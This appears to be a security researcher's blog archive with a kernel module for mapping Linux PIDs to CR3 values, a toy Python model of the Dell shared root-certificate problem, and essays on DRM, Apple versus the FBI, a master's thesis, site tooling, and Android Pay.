Last week I had such an experience. Currently my research involves a lot of x86-specific programming and virtual machine introspection (VMI). To test one of the proof-of-concept hypervisors I'm working on, I needed a way to quickly convert Linux PID values into the corresponding value that gets loaded into the CR3 register when that process is executing on the CPU. For those who are unfamiliar with the x86 CPU architecture, I recommend reading this page on Linux x86 page table management. The short story is that when a process is executed on an x86 CPU, the CR3 register is loaded with the physical address of that process's page global directory (PGD). This is necessary so the CPU can perform translations from virtual memory addresses to physical memory addresses. Since every process needs its own PGD, the value in the CR3 register will be unique for each scheduled process in the system. This is very convenient for VMI because it means we don't need to constantly scan the guest kernel's memory to keep track of which process is being executed. Instead, we can just monitor writes to the CR3 register.

However, just tracking changes to the CR3 register doesn't give us much insight into what the guest kernel is doing. This is commonly referred to as the semantic gap problem. In order to cross this gap, we need to map the PID values of the processes we're interested in to their corresponding CR3 values. The following Linux kernel module code snippet does just that:

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/sched.h>
#include <linux/pid.h>
#include <asm/io.h>

unsigned long pid_to_cr3(int pid)
{
    struct task_struct *task;
    struct mm_struct *mm;
    void *cr3_virt;
    unsigned long cr3_phys;

    task = pid_task(find_vpid(pid), PIDTYPE_PID);

    if (task == NULL)
        return 0; // pid has no task_struct

    mm = task->mm;

    // mm can be NULL in some rare cases (e.g. kthreads)
    // when this happens, we should check active_mm
    if (mm == NULL) {
        mm = task->active_mm;
    }

    if (mm == NULL)
        return 0; // this shouldn't happen, but just in case

    cr3_virt = (void *) mm->pgd;
    cr3_phys = virt_to_phys(cr3_virt);

    return cr3_phys;
}

It should be noted that while the CR3 register is useful for tracking which process is being executed, it cannot track which thread is executing because threads share memory and therefore will have the same PGD and CR3 value. Keeping track of the scheduling of threads via introspection is a more complicated task and is a topic for another time.
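
To illustrate how the mapping might be used on the monitoring side, here is a small user-space sketch: a table of (PID, CR3) pairs collected with a function like pid_to_cr3() above, and a lookup that turns an observed CR3 write back into a PID. The struct and function names are hypothetical, and a linear search is only reasonable for a handful of watched processes.

```c
#include <stddef.h>
#include <stdint.h>

/* One watched process: its PID and the CR3 value recorded for it. */
struct watch_entry {
    int pid;
    uint64_t cr3;
};

/* Return the PID whose recorded CR3 matches the observed value,
 * or -1 if the value belongs to a process we are not watching. */
int cr3_to_pid(const struct watch_entry *table, size_t n, uint64_t cr3)
{
    for (size_t i = 0; i < n; i++) {
        if (table[i].cr3 == cr3)
            return table[i].pid;
    }
    return -1;
}
```

Because threads share a CR3 value, a hit only identifies the process, not which of its threads was scheduled.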

For simplicity I implemented the conversion code as a Linux kernel module. If you're interested in how to do this conversion using pure introspection on an unmodified kernel, you should check out libVMI's code.

Site Redesign

2017-01-24T19:20:00-05:00

HTML5Up

When I originally registered the domain carteryagemann.com I imagined it would be a single static page summarizing my professional career: an eye-catcher for recruiters and peers searching my name on the internet. I wanted a place for bragging that I would have complete control over and that would not be restricted by the cookie-cutter molds set by social networking sites. A few months later I was asked to write blog articles for Syracuse University's engineering college and suddenly my website was no longer a single page. As much as I liked my HTML5Up design, I needed new templates. I also have to admit that the JavaScript my site originally used was slow at times.

AMP HTML

I always liked the idea of fast and efficient web pages, especially when those web pages are being served at my expense. I wanted to stay with static pages for two main reasons. First, static pages are cheaper and easier to host and cache. Second, static pages pose little attack surface. The last thing I wanted as a security professional was for a site with my name on it to get compromised because I only look at it twice a year.

I was browsing around for platforms to build my new site on when I heard about this thing Google was working on called AMP HTML. What drew me in was their promise of a fast user experience and a specification designed for being cached. Google was going to cache and prioritize search results for AMP HTML pages and even social networks like Twitter announced plans to implement AMP HTML caching servers. All this meant free bandwidth and geographically distributed caching for my humble site. Perfect.

Sadly, about a year after I reworked my entire site to run on AMP HTML (I had even visually designed it based on Material Design), I realized my decision was not the best. More accurately, my work in security brought me into contact with more privacy-minded people and over time I came to adopt their mindset. I stopped seeing AMP HTML as an open source project and became hung up on the company that sat behind it. A company that over the years has pushed a narrative in cyberspace aimed at destroying privacy with promises of convenience while hiding its true goal of making money by knowing as much about people as legally (not ethically) possible. As the now famous saying goes:

If you're not paying for it, you're the product.

There were also three other reasons for my dissatisfaction with AMP HTML:

Mandatory JavaScript

As someone who values security and privacy, I try my best to make websites that are functional even when the user disables active content (JavaScript, Flash, etc.). If a site wants to use JavaScript to make some parts prettier (e.g. syntax highlighting code) or save bandwidth (e.g. AJAX), that's fine. On the other hand, I find it very rude and unethical when a site won't even display a single image or line of text until the user executes JavaScript from 30+ sources (news sites are particularly notorious for this). JavaScript is code, code can be malicious or invasive (e.g. JavaScript exploit kits for installing ransomware), and just like how I wouldn't hand someone I just met a self-signed Windows executable and ask them to run it, a user shouldn't be forced to execute JavaScript upfront just to see what the site is about. This is even more true when that JavaScript is heavily compressed and obfuscated.

In-line CSS

In order for AMP pages to be easily cached, the specification requires that all CSS be embedded directly in the HTML. This quickly becomes a problem when you have multiple web pages and you want to adjust your site's theme. Writing all the pages by hand turned out to be a major mistake that led to inconsistent formatting and unnecessary work.

Public Opinion

People, especially those with a technical background, are becoming more conscious of the importance of privacy and security and more wary of the power wielded by major tech companies. Even the tech enthusiasts that buy into the mantra of "nothing to hide" have become more cautious of walled gardens that try to lock the user in. The result is negativity towards the AMP HTML platform.

Additionally, as the AMP HTML specification evolves, people both on the technical and nontechnical sides are becoming confused.

In response to all these points, I decided it was time to move to a different platform for managing my website.

Pelican

For my new site I still wanted static pages for their cheap hosting, easy caching, and security, but I also wanted to be able to write my content in a high-level language and have a program automate compilation and deployment. This isn't a new idea by any stretch, so I knew there had to be good tools readily available. After looking at what the blogs I read were using and hearing a few recommendations, I decided to go with Pelican. For those of you who want to statically host blogs, I highly recommend it. The learning curve is manageable and the tools are very comfortable for technical people who already prefer command lines. Pages and articles can be written in Markdown, which should be familiar to anyone who stores code in git repositories. There are also plenty of free and publicly available themes, including the one I'm using for the site right now. I'll stop there before I start to sound like a salesman.

However, while I'm on the topic of plugging software I like, I will also give a quick mention to linkchecker, which I used to find and fix a few links in my past articles to external sites that no longer exist.

So there you have it. The site now runs on Pelican, I like it very much, and hopefully the considerations I listed here will give you ideas to think about.

The Problem with DRM

2016-10-22T22:30:00-04:00

Preamble

The topic of digital rights management (DRM) systems is a controversial one among those affected by it. Some readers are going to jump to conclusions without properly reading what I want to write on the matter and there's nothing I can do about that. To those with minds open enough to read this entire blog post honestly, I promise to present you with a perspective that, although not novel to everyone, isn't a rehash of the most common arguments made on the topic. What I will argue is a stance based on my technical understanding of computer systems as an information security researcher, which I believe is a perspective many aren't exposed to. If by chance you happen to be such a researcher, you probably won't find this post particularly interesting. For everyone else I hope to present a robust formulation of the problem that is insightful while still being easy to understand.

Additionally, as is necessary when discussing controversial topics, I must state that the contents of this post are my personal opinions and mine alone.

Motivation

DRM has become an active topic of debate in multiple communities due to recent changes in how technology allows us to access and experience digital content, such as movies, shows, games, and music. With the decline in users buying and storing their own digital content in favor of services (Netflix, Hulu, Steam, Spotify, etc.) that offer to stream it over the internet on-demand, DRM touches more lives now than ever before.

For users of these services the benefits of not having to think about storage and having cheap and immediate access to the latest content are very appealing. Try to access content from even a year ago, however, and the trade-off becomes apparent. These services may be cheaper, but they also don't guarantee lifetime access as licenses change and budgets require money-saving cuts. As some users have been frustrated to realize, there's a difference between paying to access and paying to own. Adding to the frustration is the inability to access content on some services when an internet connection is slow or unavailable.

The idea of using computers to illegally share digital content is not new to digital content services, but these services do give the act new motivation. Where users might once have considered illegal sharing to avoid the cost of buying the digital content, now users seek to avoid subscription fees, ensure lifetime availability, and counteract limited internet connectivity. This motivates license holders to require services to implement DRM: systems designed to make it difficult for a user to permanently store and illegally share on-demand digital content.

However, I fear that many license holders demand these systems without actually realizing their limitations and unintended consequences. That is why in this blog post I would like to take the time to formulate the problem of using DRM to protect against illegal storing and sharing from the perspective of an information security researcher. Frankly, I think DRM is a losing battle and I want to present the reader with a robust formulation to justify why I see it that way.

Cat and Mouse

The first thing we have to understand is that DRM in practice cannot completely prevent illegal storage and sharing. Simply put, you can't show someone something without showing it to them and once they've seen it, you can't prevent them from having some ability to reproduce it. Even if you had a magic wand that could somehow wipe their memory, who's going to want what you have to share if they won't remember it? DRM cannot be perfect.

However, this is not to claim that DRM cannot be effective. Specifically, we can think of using DRM as making a trade-off between multiple factors: the cost of implementing the DRM and the inconvenience the DRM presents the benign user versus the time and skill required for the adversarial user to bypass it. In other words, an effective DRM system is one that is cheap to implement, produces few enough side effects that the benign user is still willing to pay for the service, and requires the adversarial user to commit a lot of time and skill to bypass.

So keep the good, throw out the bad, and we're done, right? Not so fast. We could do just that if the factors had no relationship to each other, if they were independent, but they aren't. Anything you do to make the adversarial user's task harder is going to increase the cost of implementation and inconvenience the benign user. Don't believe me? Implementing software DRM restricts the benign user to only systems that can run that software and allows the adversarial user to bypass the DRM using their own software. Operating system DRM now requires the adversarial user to implement their own operating system software, but also now restricts which operating systems the benign user can use. Hardware DRM raises the bar further by requiring the adversarial user to devise a hardware level bypass, but now the benign user can only use certain hardware. Hopefully you can see how this is a game of cat and mouse. The harder you make it for an adversarial user to bypass the DRM, the more restrictive the benign user's experience becomes. Similarly, as you increase the skill the adversarial user needs to bypass the DRM, you also raise the skill the programmer implementing the DRM needs to design it, which raises the cost. Basically, as you make the DRM better at thwarting the adversarial user, you also make the service more expensive and less appealing to the benign user.

Hopefully you now see why balancing the factors I've pointed out is not trivial. The next question is how hard it is to find this optimal balance. If it's easy, we can just find it and we're done. We'd then know what degree of DRM to implement.

Sadly, I'm going to argue that it's not easy to find. In fact, finding it is difficult precisely because it's subjective and constantly changing! Notice that all the factors I defined are very soft. User experience is hard to measure. The user's tolerance for being inconvenienced is hard to measure. Even skill and cost are hard to measure in this context. Not only that, but these factors change over the course of public discussion. Opinions simply change. What all this means for us is that it's difficult to measure the factors we're interested in, it's difficult to determine when we've struck an optimal balance, and even if we strike a balance it might not stay balanced for very long. In other words, our best efforts will be no better than a random guess. Sure we might get lucky, but why pay to play in the first place?

Two Extra Cents

In general I find it interesting to argue that people are blinded by an unjustified pressure to achieve progress. That's not to claim that we never take steps in the right direction, but rather that when the path becomes too foggy we tend to start taking random steps and then spend a lot of effort convincing ourselves that the steps somehow weren't random. It's worth pondering if a solution has fallen into this pattern because the result when it does is a lot of effort spent on something that doesn't actually solve the intended problem.

Demystifying the Master’s Thesis — Is it right for you?

2016-04-21T22:30:00-04:00

Originally written for the Syracuse University College of Engineering blog.

A few weeks ago I successfully defended my master’s thesis. At 55 pages long, it summarizes my research findings from two years spent in Professor Kevin Du’s lab studying the security of the Android operating system. With its acceptance, I receive the last six credits needed to complete my degree. It was a long and intense process, and honestly, there are easier ways to earn credits.

Depending on your program, a thesis isn’t always a requirement. Many students opt for their program’s non-thesis track. So, how do you know if completing a thesis is right for you?

Let’s start by defining it. A master’s thesis is a cumulative work summarizing a student’s independent research on a specific topic related to their major. In my case, that topic was the security and privacy of Android intent inter-process communication. Translation—how do applications in an Android device share messages between one another and what features can we add to protect their “conversation?”

Thesis work is overseen by a research advisor, a professor who provides feedback and direction. Ultimately, it is the student’s responsibility to find a topic and perform the study on their own. Depending on the field of research, it will generally take a student one or two years to finish writing their master’s thesis. This makes prior planning essential to ensure that the thesis will be completed in time for graduation.

Once the thesis is complete and the advisor is satisfied with the work, the student has to defend it in front of a committee of four faculty members. The defense consists of a 20-minute presentation followed by questions. It takes about an hour. Once complete, the members convene privately to decide the outcome of the defense. A thesis can either be accepted, accepted with minor revision, accepted with major revision, or rejected. Thankfully, rejections are rare when the student follows their advisor’s guidance.

Once the thesis is accepted and any revisions are made, it’s sent off for publication and will usually be printed and placed in the university’s library. Most departments give their thesis students three to six elective credits depending on how much time went into creating the thesis.

So that’s all the gritty detail of how a master’s thesis works, but why do one in the first place? If your objective is to get your degree and go directly into industry as efficiently as possible, a thesis probably isn’t for you. It’s much safer to take classes to get those elective credits and most employers value time spent in internships more. The student who should consider a thesis is one who is interested in gaining exposure to research. I could write at great length about the difference between being an engineer and being a researcher, but suffice it to say, the open-endedness makes researching a very different ballgame. A master’s thesis is a great opportunity to test the waters and see if that’s the kind of career you want to pursue. If you go for it, it opens the door to pursue a doctorate. If not, the door to industry will certainly be open to someone with your qualifications and research.

As with anything, it’s important to make the choice that is right for you. For me, the extra effort was well worth it. This fall I’ll be a doctoral student at Georgia Tech, a goal I am very proud to achieve. My experience completing my thesis at Syracuse University’s College of Engineering and Computer Science and in Professor Du’s lab has given me the confidence to take another leap into computer science research.

About The Author

Carter Yagemann ’15 is a master’s student studying computer science in Syracuse University’s College of Engineering and Computer Science. A research assistant in Professor Kevin Du’s Android security lab, his interests include mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University’s School of Information Studies (iSchool).

Apple’s Balancing Act—Yesterday, Today, and Tomorrow

2016-04-01T22:30:00-04:00

Originally written for the Syracuse University College of Engineering blog.

A few months ago I read Splinternet by Scott Malcomson. It recounts the early days of the internet and personal computing. One section in particular caught my attention—a quote taken from an abandoned Apple ad campaign:

"There are monster computers lurking in big business and big government that know everything from what motels you’ve stayed at to how much money you have in the bank. But at Apple we’re trying to balance the scales by giving individuals the kind of computer power once reserved for corporations."

This quote is from 1984, and yet it could just as easily be mistaken for something said in 2016 given today’s controversies. I find it provocative for two reasons.

First, three decades later the issues raised in this marketing pitch are still relevant. Today, we struggle to decide how to handle technology that knows our very location, companies that track our browsing behavior via web cookies, and governments that make lethal decisions based on metadata. On one hand, it’s frustrating to see how little progress we’ve made in solving issues like these, but on the other it’s comforting to know that problems like these aren’t new and we’ve survived to this point in spite of them. I’m optimistic that as these issues grow to affect our lives in more significant ways, we’ll accelerate our efforts to resolve them.

Second, look at how much Apple has changed in three decades. Look at how they’ve gone from being the underdog, liberating the masses from the chains of the IBM mainframes only to become a massive conglomerate themselves. Modern Apple has appealing products for sure, but make no mistake that what they offer is a closed ecosystem where the customer is expected to run Apple software on top of Apple hardware. In the pursuit of perfecting the user experience, Apple has created a walled garden that takes control of their products away from the consumer. This is a stark contrast to the Apple that once made the analogy of the personal computer being a bicycle for the mind.

All that said, perhaps the Apple of tomorrow will strike a new balance between these two Apples I’ve mentioned. We’ve seen in recent months Apple’s commitment to resisting the FBI’s request for aid in unlocking encrypted iPhones. We might even see future iterations of the smartphone implement new security features that even Apple won’t be able to bypass. Only time will tell how the second act of this ongoing story will play out, but I’m excited to watch it develop.

Apple vs. the FBI

2016-02-22T22:30:00-05:00

Originally written for the Syracuse University College of Engineering blog.

In the wake of the tragic shooting in San Bernardino, many questions remain and people want answers. It seemed like a breakthrough in the investigation was imminent when the FBI got their hands on an iPhone belonging to one of the shooters, only to be thwarted by the discovery that the device was encrypted and password protected. Ten wrong guesses and the device will wipe itself clean, including all the precious data within.

In light of the situation, a judge officially ordered Apple to aid the FBI in unlocking the iPhone. However, Apple has announced that they refuse to comply. Not only that, but Google has also announced that they support Apple’s decision to challenge the judge’s ruling. Why are two major tech companies reluctant to aid in an investigation? The problem has nothing to do with the technology, but rather the societal consequences such aid would bring.

In order for Apple to unlock the shooter’s device, they would have to circumvent the security mechanisms of their own device. This same technique could then be applied to any iPhone in the world. If Apple created such a capability and put it to use in this case, who’s to say they would never use it again? Allowing for such a power to exist would create a precedent which would undermine their customers’ trust in all of Apple’s products. And this distrust could radiate outwards to other tech companies like Google and Microsoft, which could be asked to do the same.

But the consequences wouldn’t only be to Apple’s profit margin. Encryption levels the playing field between the mighty and the weak. The same encryption that is thwarting the FBI’s investigation is simultaneously allowing citizens who live under oppressive regimes to circumvent country-wide censorship while avoiding unjust prosecution. Betray these users’ trust with this new precedent, take away their means of broadcasting their voice, and the whole world becomes a darker place.

The root of this problem is not one we are unfamiliar with. Time and time again we are presented with the question of the benefits of taking something away from everyone in order to prevent a few from abusing it. The answer is dependent on the details, and in this case I side with Apple in saying that they should not comply with this order. Compliance would not only hurt American citizens and American companies, it would hurt every citizen of every country. We cannot allow tragedy to drive us towards oppression. We must maintain transparency for the strong and encryption for the weak.

SU Senior Carter Yagemann’s Summer of Android

2016-02-22T22:30:00-05:00

Originally written for the Syracuse University College of Engineering blog.

Carter Yagemann, a rising senior in the Computer Science program from Jupiter, Florida, spent his summer crawling the Android operating system as part of the Department of Electrical Engineering and Computer Science’s Research Experience for Undergraduates (REU) program. Carter investigated Android security using “an intent firewall” to protect users’ information on smartphones and tablets. We caught up with him following his final presentation of his research to a room of faculty and students at Syracuse University.

How did you learn about the REU program?

I was actually a student in one of Professor Du’s classes and I had been doing internships in the private sector. I started as a web developer for Frontier Communications and then I worked for JPMorgan Chase in some of their security areas. I wanted to gain as much exposure as I could, so I was interested in getting into research. I approached Professor Du and he gave me an offer to do research under him.

What has this experience been like?

It’s been a lot of fun. It’s been nice to pursue what I’m interested in. There’s a lot less red tape and hurdles when you’re doing research versus in the private sector where there is a lot of regulation and accountability. It was really fun, really educational. I get to be with my peers, people more my age. I can mostly do what I want.

One of the things that is very different with research is that it’s very open ended. You don’t really know what’s going to get traction and what’s going to turn out to be impossible. It’s very free flowing and very flexible. The professors give you some ideas of where to start and you go from there to see if it works or not.

Professor Du was definitely interested in the intent firewall, but most of my research is my own work. I made all of the documentation and the website. I’m the one who crawled all the source code. He was the one who gave me the idea and I took off with it.

Why did you choose to come to Syracuse University?

I was choosing between here and Drexel University and I wasn’t sure that I wanted to be in a big city like Philadelphia. I picked Syracuse because there’s a nice atmosphere here. It’s a condensed campus, and there’s a lot going on. It’s a nice place to be.

What else are you involved in at SU?

I like everything about programming, so I do some hack-a-thons at the Student Sandbox at the Tech Garden in Downtown Syracuse. I have a few friends from the iSchool who often get together to do little things. Freshman year we created a platform called BeerText. The idea was you could text the name of a beer to a certain number and it would send you back a text with a description of the beer. It was really cool. It went viral on Twitter and Reddit. We got 35,000 users in 48 hours.

What do you plan to do with your degree in Computer Science after you graduate?

I definitely want to continue to pursue cybersecurity. Right now I am looking in multiple places. I’m looking at what’s going on out in Silicon Valley and what’s going on with the government.

I am also interested in being an entrepreneur. I have started writing some applications and I have pushed some out to the Google Play Store. I’m kind of a one-man app dev company. I’m definitely interested in getting out there on my own or with friends and talented people. On the other hand, large companies tend to have the resources to be able to do some pretty interesting things.

I just want to go where the interesting work is – something I haven’t seen before. I’m really open. Part of the point of this research was to try to find where I’m happiest.

About the Electrical Engineering and Computer Science REU

The Department of Electrical Engineering and Computer Science hosted its annual Research Experience for Undergraduates (REU) program this summer. It culminated with a half-day of presentations in July in which seven REU students from four different universities, including SU, Cornell, SUNY Fredonia, and the University of Illinois at Urbana-Champaign, presented research on a range of topics. The predominant theme was the development and security of the Android operating system.

Over the course of the summer, students worked with an advisor to select a topic that interested them and advanced the College’s research, then immersed themselves in their chosen subjects. The experience is educational for the students and the advisors alike.

“There are expectations that we are researching and getting something out of this experience. The first thing we are asked is what we want to work on, then our advisor helps us develop research questions from that,” describes Jonathan Secora, a computer science major at SU who focused on animations on the Android platform this summer.

Kevin Du, Professor of Computer Science, advised the students who focused on Android devices, including:

Gabrielle George, “A Drinking From the Fire Hydrant Approach to Learning Computer Science”
Jonathan Secora, “Animation and Application in Android”
Curtis Robinson, “A Short Survey of Android”
Jason Davison, “Communication Problems with the Android System”
Carter Yagemann, “Intent Firewall – Android Security via Intent Filtering”

Fred Schlereth, Associate Research Professor of Electrical Engineering, advised Tom McLeod as he examined “Trapping of Molecules Inside Non-Ideal Nanoscale Channels.”

Current Computer Science Ph.D. student Paul Rattazi advised Wesley Brooks at AFRL on “Self-Protecting Apps: Helping Developers Protect Your Sensitive Data.”

How Orange Helps You Sleep At Night

2016-02-04T22:30:00-05:00

Originally written for the Syracuse University College of Engineering blog.

Everyone at Syracuse University knows that orange is the very best college color, but who knew it could also help you sleep? Research conducted in recent years has shown that sleep problems are on the rise, and one theory gaining momentum points to our electronics as the cause. Studies find that the abundance of blue light produced by our smartphones, tablets, and computer screens has a tangible impact on the chemistry in our bodies that regulates when to wake up and when to go to sleep. This isn’t a problem during the day when the sun naturally produces its own blue light, but staring at our own personal mini sun before bed can make falling asleep much more difficult.

So what can we do about it? We could stop staring at screens an hour before bedtime, but the world is a busy place and our nighttime reading isn't always ink on paper. Instead, programmers are experimenting with software that reduces the level of blue light our screens produce after sunset. As the sun goes down, the screen shifts from a bluish glow to an orange tint and then back to blue with the following sunrise, promising a better night’s sleep for those of us who are unable (or unwilling) to give up our screens at night.

This software is already publicly available for computers thanks to groups like f.lux, but availability on mobile devices is limited. Luckily, the big companies have taken notice and are taking action. In an upcoming version of iOS for iPhones and iPads, Apple plans to introduce Night Shift. Flip it on and it'll automatically determine when the sun sets and rises in your area and adjust the screen's color accordingly. Just another reason to GO ORANGE.

Understanding Dell’s Root Certificate Problem

2015-11-30T22:30:00-05:00

Originally written for the Syracuse University College of Engineering blog.

A recent discovery in the security community has researchers concerned about Dell devices. Some of these devices have been found to contain something known as a self-signed root certificate. Installed by the manufacturer for advertising purposes, these certificates pose a risk to users. This is not the first time this has happened; there was an earlier case involving Lenovo devices known as Superfish. In this article I will try to explain the problem in an approachable manner as well as point readers towards actions they can take to protect themselves.

What are these self-signed root certificates the security experts talk about and why are they dangerous? Understanding the problem requires understanding some of the characteristics of something known as the public key infrastructure. PKI is complex in practice, but we can use a simplified model to understand the problem at hand. All we need to know is that there are keys and certificates. By using a key, one can create certificates. If we trust the party who holds a particular key, then we can trust the certificates made from that key. Trust, in this case, implies two fundamental trusts. First, that the party that holds the key will keep that key secret. Second, that the party will only make certificates for other trustworthy parties. This is the network of trust upon which we perform our sensitive internet tasks such as banking, shopping, and communicating.

The problem with the Dell root certificate and Superfish is that the manufacturer has created a "trusted" key which sits on every user's device. The same key. Steal this key from any one device and now that thief can create certificates that will be trusted by all devices. Google, Facebook, Bank of America, Amazon, all of these parties can be impersonated by creating new certificates. Exposing users to such a risk is a severe oversight.
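
The shared-key problem can be illustrated with a toy model. This is only a sketch of the simplified keys-and-certificates picture above, not of real PKI: it uses an HMAC from Python's standard library as a stand-in for a digital signature, and the key values, the `bank.example` name, and the helper functions are all made up for illustration.

```python
import hashlib
import hmac
from typing import Tuple

Certificate = Tuple[str, bytes]


def issue_certificate(root_key: bytes, subject: str) -> Certificate:
    """Create a toy 'certificate': the subject name plus a tag made with the key.

    Assumption: HMAC stands in for a signature. Real certificates use
    asymmetric cryptography.
    """
    tag = hmac.new(root_key, subject.encode(), hashlib.sha256).digest()
    return subject, tag


def device_trusts(root_key: bytes, certificate: Certificate) -> bool:
    """A device trusts a certificate if its tag verifies under the trusted key."""
    subject, tag = certificate
    expected = hmac.new(root_key, subject.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(tag, expected)


# Hypothetical manufacturer key, installed identically on every device.
SHARED_ROOT_KEY = b"same-key-on-every-device"
device_a_key = SHARED_ROOT_KEY
device_b_key = SHARED_ROOT_KEY

# A thief extracts the key from device A and forges a certificate for a bank.
forged = issue_certificate(device_a_key, "bank.example")

# Device B, which the thief never touched, accepts the forgery.
forged_is_trusted = device_trusts(device_b_key, forged)

# If device B trusted a different key, the same forgery would be rejected.
forged_is_rejected = not device_trusts(b"key-unique-to-device-b", forged)
```

In this model, `forged_is_trusted` comes out true only because both devices hold the same key, which is the heart of the problem described above.
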
Thankfully, the concerns of the security community have been heard and users can now take actions to remove these self-signed root certificates. If you use a Dell or Lenovo device, I encourage you to consult your manufacturer's website for more details.

Students Compete in RIT Cybersecurity Competition

2015-11-11T22:30:00-05:00

Originally written for the Syracuse University College of Engineering blog.

Last weekend, I had the opportunity to compete in the first-ever Collegiate Pentesting Competition along with five other members from the iSchool's Information Security Club. Hosted by RIT, this competition places competing university teams in the role of security consulting companies contracted to assess the strength of a corporate network. This competition stresses technical and soft skills. Competitors must leverage their technical abilities to find vulnerabilities, as well as document and present their findings to the nontechnical executive board of the corporation. I am excited to announce that out of the nine university teams that competed from across the northeast, Syracuse University took third place!

The Collegiate Pentesting Competition distinguishes itself from other cybersecurity competitions by placing a heavy emphasis on the business side of running a security company. Traditionally, security competitions fall into two categories: purely defensive or purely offensive. Purely defensive competitions, such as the Collegiate Cyber Defense Competition, restrict competitors to solely defending a network while a professional team of hackers tries to exploit vulnerabilities to gain access. This type of competition forbids any offensive actions on the part of the competing students.

Conversely, purely offensive competitions, such as Capture The Flag events, present competitors with tasks that must be completed by breaking into vulnerable computer systems. Since the sole objective of these competitions is to recover the “flags,” competitors are encouraged to use any offensive tactics possible with complete disregard for collateral damage. In these competitions, the systems and networks often get destroyed as teams race to complete the given tasks.

The Collegiate Pentesting Competition is a hybrid between offense and defense. Teams still use offensive techniques to detect and exploit vulnerable systems, but they must do so in a way which does not damage the systems or hinder the company's ability to do business. This requires the teams to be surgical in their methodology rather than simply “smashing and grabbing.”

Overall, I highly enjoyed this competition. The level of realism and professionalism it entailed made competing a very educational experience. I look forward to seeing the Information Security Club compete next year.

Android for Your Laptop

2015-11-03T22:30:00-05:00

Originally written for the Syracuse University College of Engineering blog.

Google recently announced plans to merge features from Chrome OS into Android to make the operating system suitable for use with laptops. This means that in the future, we can anticipate Android working across phones, tablets, and laptops. This is a very bold vision, but it's one that was bound to happen and one that all Android users should be excited for.

Up to this point, Chrome OS has been Google's dedicated operating system for their lineup of Chromebook computers. While Chrome OS offers unique features in terms of user experience and security at a price point that beats most other laptops on the market, Google's substantially different approach to designing laptops has made the Chromebook a relatively niche device. In the years it has existed, it has never reached the point of being a real competitor in the Windows-dominated laptop market. Contrast this with Android, which dominates the smartphone market at over 80 percent market share, and the reasoning behind this merging of the two operating systems becomes clear. If Google can successfully take their winning mobile user experience and port it to laptops, they'll have a formula for a laptop that stands toe-to-toe with Windows and OS X. I think that this is going to be the Google operating system to give Microsoft and Apple a run for their money.

Users should be excited for this move as well. The average user now owns more devices than ever before and they want a consistent experience regardless of whether they're using a phone, tablet, laptop, or desktop. Google does an excellent job of making the interaction between the user and the device clean, efficient, and friendly, and soon we'll get these same benefits for the laptop. However, there are a handful of design challenges that Google will have to overcome if they want Android for the laptop to be a success and not just another niche product like Chrome OS.

For starters, laptops are predominantly used for content creation, whereas mobile devices are mostly used for consuming it. Laptops are like the working man's pickup truck. Users have different demands for laptops than mobile devices. If Android is to succeed in the laptop environment, a greater emphasis will have to be placed on productivity. This means efficient switching between applications, strong support for keyboards, and plug-and-play functionality for external storage and additional peripherals. These are things only supported to a limited degree in current Android.

Screen size also becomes an issue for Android on laptops. Android's current interfaces are designed for relatively small screens, under 10 inches in size. Now that Google wants Android to run on laptops and desktops, they'll have to redesign the look and feel for screen sizes in excess of 16 inches. It may only be a few extra inches, but this makes a huge difference if you don't want the screen to appear barren.

For the average user who already uses Android on their mobile devices, I think the transition to Android for laptops will be pretty smooth. Android already has the email clients, web browsers, and office applications these users need for their everyday work. For the "power user," however, I think the new operating system will be a harder sell. These users manage corporate infrastructures, develop software, automate systems, deploy virtual machines, and regularly perform compute-intensive tasks. For them, unfortunately, the tools they need simply don't exist on Android yet.

I've anticipated Android moving to laptops and desktops for some time now and I hope others share my excitement over this recent announcement. There's a lot of work to be done, but I think that if Google can pull this off, we'll end up with something very special and unique.

About The Author

Carter Yagemann '15 is a master's student studying computer science in Syracuse University's College of Engineering and Computer Science. A research assistant in Professor Kevin Du's Android security lab, his interests include mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University's School of Information Studies (iSchool).

Initial Observations Regarding Android Pay

2015-10-30T22:30:00-04:00

Android Pay has just come out on the Google Play Store and it's an interesting concept in many ways. I can't help but be curious about its internal workings and after some discussion with a co-worker, I've decided to quickly write up our initial thoughts on the application.

Scope

These are some initial thoughts I had from a security perspective after using Android Pay for the first time. These observations are purely speculative and black box, so they should not be mistaken for fact. These speculations are being made before having done any decompilation or reverse engineering. I will try my best throughout this document to clearly state the observations driving each speculation I make.

Transparency

The first thing that stuck out to me is that Android Pay does not appear to be transparent to the banks. When I added my debit card to the application, for example, I was presented with an EULA from my particular bank. After that, I had to verify my card by signing into my bank's application. In the case of my co-worker, he didn't have to verify his card, but he did receive an email from his bank within minutes containing information regarding Android Pay. In other words, while I may not know exactly how the Android Pay system works, I speculate that it does necessitate the banks being aware of Android Pay. You'll see why this is important in the next speculation.

Virtual Account Number

The other thing that immediately stuck out to me is that upon adding a card to Android Pay, that card is given a "virtual account number." The in-app description of this number reads, "This number is used instead of your actual card number so that your info isn't shared with stores."

Interesting.

While privacy may indeed be part of the motivation behind using a virtual number instead of the real card number, I don't believe this to be the full story. Having worked in a bank for a short while, I know that one of the biggest concerns a bank has is liability and therefore risk management. As we speculated earlier, Android Pay isn't transparent to the banks. This means that the banks have a choice in participating which, in turn, means that they aren't going to participate unless the risks associated with Android Pay are minimal. I speculate this to be the true reason for the virtual number. By using this number in place of the real card's number, should a vulnerability in Android Pay be exploited, damage is limited to exposure of the virtual number and not the real number. Google can reissue this virtual number while the banks are protected from having to reissue a new card. Granted, a fraudulent transaction or two may occur in the time it takes for the virtual number to be deactivated and reissued, but the majority of the burden falls on Google and not the bank. It's even possible that the banks might have an agreement with Google where Google is responsible for repaying the banks for fraudulent charges occurring due to Android Pay.

This idea of risk mitigation will come up again in a later speculation I make.

Transaction Processing

The ultimate question my speculations aim to shed light on is how does Android Pay work? What happens when a user makes a purchase using Android Pay? Given the previous two speculations, we can make some educated guesses. I must stress again that this is still speculation, but food for thought nonetheless.

